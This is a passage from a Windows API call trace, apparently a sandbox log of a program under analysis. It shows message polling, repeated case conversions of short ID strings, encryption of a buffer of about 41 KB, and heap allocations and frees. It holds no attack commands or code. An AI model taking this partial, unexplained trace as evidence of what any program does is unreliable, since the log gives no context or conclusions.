wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.720] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.720] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.720] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.720] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.720] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.720] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.720] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.720] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.720] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.720] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.720] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.720] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0158.721] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0158.721] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0158.722] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0158.722] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0158.722] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0158.722] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0158.722] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0158.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.723] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xa1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xa200) returned 1 [0158.723] CharLowerBuffW (in: lpsz="byte[41472]", cchLength=0xb | out: lpsz="byte[41472]") returned 0xb [0158.723] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0158.723] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0158.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.724] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a0048*, pdwDataLen=0x8bef68*=0xa1f8, dwBufLen=0xa200 | out: pbData=0x34a0048*, pdwDataLen=0x8bef68*=0xa200) returned 1 [0159.232] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0159.232] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0159.232] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.232] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.232] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.232] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.232] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.232] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.232] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0159.233] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0159.233] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.233] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.233] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.233] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.233] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0159.233] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0159.239] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0159.239] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0159.239] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.239] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.240] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.240] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.240] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.240] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.240] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.240] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0159.240] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0159.241] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0159.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.241] CryptDestroyKey (hKey=0xaa56a0) returned 1 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0159.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0159.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0159.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0159.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0159.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0159.242] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0159.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0159.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0159.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0159.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.243] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0159.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0159.244] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0159.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0159.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0159.244] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0159.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0159.244] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0159.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0159.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.245] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0159.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.245] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0159.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0159.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0159.245] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0159.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0159.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0159.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0159.246] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0159.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0159.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0159.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0159.247] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0159.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0159.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.247] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0159.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.247] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0159.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0159.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0159.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0159.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0159.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0159.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0159.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0159.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0159.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0159.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: 